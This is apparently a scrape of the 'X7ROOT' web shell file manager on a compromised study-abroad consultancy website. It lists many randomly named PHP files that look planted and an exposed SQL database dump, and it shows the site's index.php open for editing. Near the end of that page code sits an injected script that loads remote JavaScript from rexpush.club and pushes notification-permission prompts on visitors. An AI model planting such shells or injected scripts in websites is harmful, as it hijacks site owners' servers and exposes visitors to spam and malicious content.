X7ROOT File Manager
Current Path:
/home/bmglobalcareers/public_html
home
/
bmglobalcareers
/
public_html
/
📁
..
📄
.htaccess
(243 B)
📄
7e8fcfa2f51affa33b3fa699f35ec4ad.html
(51 B)
📁
Emails
📁
_errorpages
📄
about.php
(4.23 KB)
📄
admin.php
(4.23 KB)
📄
appointment.php
(26.94 KB)
📄
appointment_old.php
(29.26 KB)
📄
bmglobalcareers_bm.sql
(859.73 KB)
📁
check
📁
commentsos
📄
contact.php
(2.72 KB)
📄
contact_mail.php
(18.97 KB)
📁
css
📄
education_loan.php
(12.32 KB)
📄
filters.php
(824 B)
📁
fonts
📄
footer.php
(9.94 KB)
📁
gfherhfghre
📄
header.php
(10.44 KB)
📁
images
📄
index.html
(181 B)
📄
index.php
(15.17 KB)
📄
join_our_community.php
(8.37 KB)
📁
js
📁
ktgadmin
📄
l0ldae.php
(3.89 KB)
📁
net
📄
ob.php
(0 B)
📄
p0nj7l.php
(3.89 KB)
📄
process.php
(2.96 KB)
📄
rmxt5d.php
(1.4 KB)
📄
robots.txt
(978 B)
📄
route_map.php
(5.68 KB)
📄
services.php
(2.61 KB)
📄
test.html
(1.37 KB)
📄
test_mail.php
(824 B)
📁
uploads
📄
utchihaWSo_wEq2w.php
(0 B)
📄
utchiha_1ldSxK1Y.php
(8 KB)
📄
utchiha_3ovmPINW.txt
(9 B)
📄
utchiha_8JYmBVa0.php
(0 B)
📄
utchiha_9AwhI32Q.php
(0 B)
📄
utchiha_DmF3lPsM.php
(8 KB)
📄
utchiha_EDirtMq6.php
(8 KB)
📄
utchiha_HGax88RT.txt
(10 B)
📄
utchiha_Js0AkoBP.php
(8 KB)
📄
utchiha_MZpQ5gcI.php
(0 B)
📄
utchiha_RW54Vwo0.php
(0 B)
📄
utchiha_ZXckxdr2.php
(0 B)
📄
utchiha_gGs7o5Gx.php
(0 B)
📄
utchiha_hhjIolpM.php
(8 KB)
📄
utchiha_wfJINYGr.php
(214.79 KB)
📄
utchiha_z5d2rSoQ.php
(0 B)
📁
vendors
📄
videos.php
(7.56 KB)
Editing: index.php
<?php eRrOr_REPoRTInG(0); ?><?php include('header.php'); ?> <!-- Banner Section --> <style> .banner-carousel .slide-item .image-layer { position: absolute; left: 0; top: 0; width: 100%; height: 100%; opacity: 1; z-index: 0; background-repeat: no-repeat; background-position: center center; background-size: cover; -webkit-filter: unset; -ms-filter: grayscale(100%); -moz-filter: grayscale(100%); transform: scale(1); } .banner-carousel .slide-item:before { content: ""; position: absolute; left: 0; top: 0; width: 100%; height: 100%; background-color: unset; opacity: 0.6; z-index: 1; } .modal { display: none; /* Hidden by default */ position: fixed; /* Stay in place */ z-index:9999; /* Sit on top */ padding-top: 50px; /* Location of the box */ left: 0; top: 0; width: 100%; /* Full width */ height: 100%; /* Full height */ overflow: auto; /* Enable scroll if needed */ background-color: rgb(0,0,0); /* Fallback color */ background-color: rgba(0,0,0,0.9); /* Black w/ opacity */ } /* Modal Content (image) */ .modal-content { margin: auto; display: block; width: 80%; max-width: 550px; } /* Caption of Modal Image */ #caption { margin: auto; display: block; width: 80%; max-width: 700px; text-align: center; color: #ccc; padding: 10px 0; height: 150px; } /* Add Animation */ .modal-content, #caption { -webkit-animation-name: zoom; -webkit-animation-duration: 0.6s; animation-name: zoom; animation-duration: 0.6s; } .close { position: absolute; top: 15px; right: 35px; color: #f1f1f1; font-size: 40px; font-weight: bold; transition: 0.3s; } .close:hover, .close:focus { color: #bbb; text-decoration: none; cursor: pointer; } .about-section .image-column .image-block img { display: block; width: 100%; -webkit-filter: unset; -ms-filter: grayscale(100%); -moz-filter: grayscale(100%); border-radius: 7px; } @media screen and (min-width: 900px) { .banner-carousel .content-box .content{ padding: 0px 0px 50px; } } @media screen and (max-width: 900px) { .offset-3 { margin-left: 0%!important; } } </style> <button id="openModalBtn" style="display: none;">Open Modal</button> <div id="myModal" class="modal" style="display: none;"> <span id="closeModalBtn" class="close">×</span> <img class="modal-content" src="images/Picture2.png"> <h1 style="font-size:18px;color: white; text-align: center;padding-top: 10px;">Do you wanna join our BMGC community? </br> Then please register here!</h1> <div class="link-box" style="text-align: center;"> <a class="theme-btn btn-style-one" href="https://bmglobalcareerscrm.eduabroadcrm.com/forms/Enquiry-Form-vGk1726210863vw" target="_blank"> <i class="btn-curve"></i> <span class="btn-title">Book An Appointment</span> </a> </div> </div> <section class="banner-section banner-one"> <div class="banner-carousel owl-theme owl-carousel"> <!-- Slide Item --> <?php $sql="SELECT * FROM tbl_banner WHERE delete_status='NDL' ORDER BY ban_id ASC"; $exce_query=mysqli_query($conn,$sql); while($fetch=mysqli_fetch_array($exce_query)){ ?> <div class="slide-item"> <div class="image-layer" style="background-image: url(ktgadmin/userdata/images/banner/<?php echo $fetch['imgname']?>);"> </div> <div class="left-top-line"></div> <div class="right-bottom-curve"></div> <div class="right-top-curve"></div> <div class="auto-container"> <div class="content-box"> <div class="content"> <div class="inner"> <div class="sub-title" style="color: #f1c852;text-shadow: 2px 2px black;"><?php echo $fetch['title']?></div> <h1 style="font-size: 40px;line-height: 45px;text-shadow: 2px 2px black;"> <?php echo nl2br ($fetch['description']);?></h1> <!--div class="link-box"> <a class="theme-btn btn-style-one" href="appointment.php"> <i class="btn-curve"></i> <span class="btn-title">Book An Appointment</span> </a> </div--> </div> </div> </div> </div> </div> <?php } ?> </div> </section> <!--End Banner Section --> <!-- About --> <section class="about-section about-section__dark"> <div class="auto-container"> <div class="row clearfix"> <!--Image Column--> <div class="image-column col-xl-6 col-lg-12 col-md-12 col-sm-12"> <div class="inner"> <div class="image-block wow fadeInLeft animated" data-wow-delay="0ms" data-wow-duration="1500ms" style="visibility: visible; animation-duration: 1500ms; animation-delay: 0ms; animation-name: fadeInLeft;"> <img src="images/gallery/vijay1.jpg" alt=""> </div> </div> </div> <!--Text Column--> <div class="text-column col-xl-6 col-lg-12 col-md-12 col-sm-12"> <div class="inner" style="margin-top: 50px;"> <div class="sec-title"> <h2>WE ARE A 'COMMUNITY' MORE THAN A CONSULTANCY. YOU'RE NOT ALONE!<span class="dot">.</span></h2> <div class="lower-text">A community of brothers and sisters to motivate and help you chase your dreams and live your passion. We listen, we advise and we guide your aspirations to study abroad.</div> </div> <div class="text"> <p style="color: #f1c852;margin-bottom: 0px;font-size: 16px;font-weight: 400;line-height: 25px;"> Truthful, Transparent, Trustworthy and Affable are our community consciences.</p> <p>Our brotherly community intends to break the myth and attest that we all are equal and the opportunity to study abroad is for all, irrespective of where, what or who we are by illuminating, guiding and connecting the aspirations of students from all spheres of the Indian society.</p> </div> <div class="text clearfix"></div> <div class="link-box" style="padding-top: 0px;"> <a class="theme-btn btn-style-one" href="join_our_community.php"> <i class="btn-curve"></i> <span class="btn-title">Join Our Community</span> </a> </div> </div> </div> </div> </div> </section> <!-- end about --> <!--Services Section--> <section class="services-section"> <div class="auto-container"> <div class="row clearfix"> <!--Title Block--> <div class="title-block col-xl-12 col-lg-12 col-md-12 col-sm-12"> <div class="inner"> <div class="sec-title"> <h2>A 360 degree guide to shape, plan and live your dream<span class="dot">.</span></h2> <div class="lower-text">We are committed to providing our customers with exceptional service while offering our employees the best training.</div> </div> </div> </div> <!--Service Block--> <div class="service-block col-xl-4 col-lg-4 col-md-6 col-sm-12 wow fadeInLeft" data-wow-delay="300ms" data-wow-duration="1500ms"> <div class="inner-box"> <div class="bottom-curve"></div> <div class="icon-box"><img src="images/flaticon/1.png" width="80px"></div> <h6><a href="services.php">THE One-One Career COUNSELLING.</a></h6> <h6 style="margin-top: 30px;font-size: 13px;font-weight: 400;">'Dream it, Believe it, Build it'</h6> </div> </div> <!--Service Block--> <div class="service-block col-xl-4 col-lg-4 col-md-6 col-sm-12 wow fadeInLeft" data-wow-delay="600ms" data-wow-duration="1500ms"> <div class="inner-box"> <div class="bottom-curve"></div> <div class="icon-box"><img src="images/flaticon/2.png" width="80px"></div> <h6><a href="services.php">SCHOLARSHIP OPPORTUNITIES</a></h6> <h6 style="margin-top: 30px;font-size: 13px;font-weight: 400;">'Funding Your Education'</h6> </div> </div> <!--Service Block--> <div class="service-block col-xl-4 col-lg-4 col-md-6 col-sm-12 wow fadeInLeft" data-wow-delay="900ms" data-wow-duration="1500ms"> <div class="inner-box"> <div class="bottom-curve"></div> <div class="icon-box"><img src="images/flaticon/3.png" width="80px"></div> <h6><a href="services.php">GOLDEN STUDY ABROAD SERVICES</a></h6> <h6 style="margin-top: 30px;font-size: 13px;font-weight: 400;">'Your Gateway to International Education'</h6> </div> </div> </div> </div> </section> <!--End Services Section--> <!--Testimonial Section--> <section class="testimonial-section"> <div class="auto-container"> <div class="row clearfix"> <!--Title Block--> <div class="title-block col-xl-12 col-lg-12 col-md-12 col-sm-12"> <div class="inner"> <div class="sec-title"> <h2>What our clients say<span class="dot">.</span></h2> </div> </div> </div> <!--Testimonial Block--> <div class="testimonial-block col-xl-12 col-lg-12 col-md-12 col-sm-12 wow fadeInUp" data-wow-delay="300ms" data-wow-duration="1500ms"> <div class="inner-box"> <div class="testimonial-carousel owl-theme owl-carousel"> <!--Testimonial Block--> <div class="testimonial-block-two"> <div class="inner-box"> <div class="content"> <div class="text">I can't thank the team enough for their help. They have made the process of applying to universities so easy and smooth. I was constantly updated about everything and they always had time to answer my questions. They truly went above and beyond!</div> </div> <div class="author-info"> <div class="author-name">John Doe</div> <div class="designation">Student</div> </div> </div> </div> <!--Testimonial Block--> <div class="testimonial-block-two"> <div class="inner-box"> <div class="content"> <div class="text">The guidance and support provided were exceptional. They helped me in every step of the process, from choosing the right university to getting my visa. Their knowledge and professionalism are unmatched.</div> </div> <div class="author-info"> <div class="author-name">Jane Smith</div> <div class="designation">Student</div> </div> </div> </div> <!--Testimonial Block--> <div class="testimonial-block-two"> <div class="inner-box"> <div class="content"> <div class="text">A big thank you to the team for helping me achieve my dreams. Their support was incredible, and they made the entire process so much easier. I'm now studying at my dream university!</div> </div> <div class="author-info"> <div class="author-name">Emily Clark</div> <div class="designation">Student</div> </div> </div> </div> </div> </div> </div> </div> </div> </section> <!--End Testimonial Section--> <!--Modal Script--> <script type="text/javascript"> let openModalBtn = document.getElementById("openModalBtn"); let modal = document.getElementById("myModal"); let closeModalBtn = document.getElementById("closeModalBtn"); // Check if the modal has been shown before let modalShownBefore = localStorage.getItem("modalShownBefore"); if (!modalShownBefore) { modal.style.display = "block"; // Show the modal } openModalBtn.addEventListener("click", function() { modal.style.display = "block"; }); closeModalBtn.addEventListener("click", function() { modal.style.display = "none"; localStorage.setItem("modalShownBefore", true); // Set flag indicating the modal has been shown }); window.addEventListener("click", function(event) { if (event.target === modal) { modal.style.display = "none"; } }); </script> <!-- RexPush Script --> <script type="text/javascript"> const sRP = document.createElement("script"); sRP.src="https://rexpush.club/js/subscribe.min.js?tag=3429&token=042ced624de6966fe758cda430dcdbe0&v=2&click_id=${click_id}&sub1=${sub1}&sub2=${sub2}&sub3=${sub3}&r=" + Math.random(); sRP.onload = (sdk) => { sdk.onSdkLoaded(() => {}); sdk.onPermissionDenied(() => {}); sdk.onPermissionAllowed(() => {}); sdk.onError((error) => {}); sdk.requestPermission(); }; (document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0]).appendChild(sRP); </script> <?php include('footer.php'); ?>
Upload File
Create Folder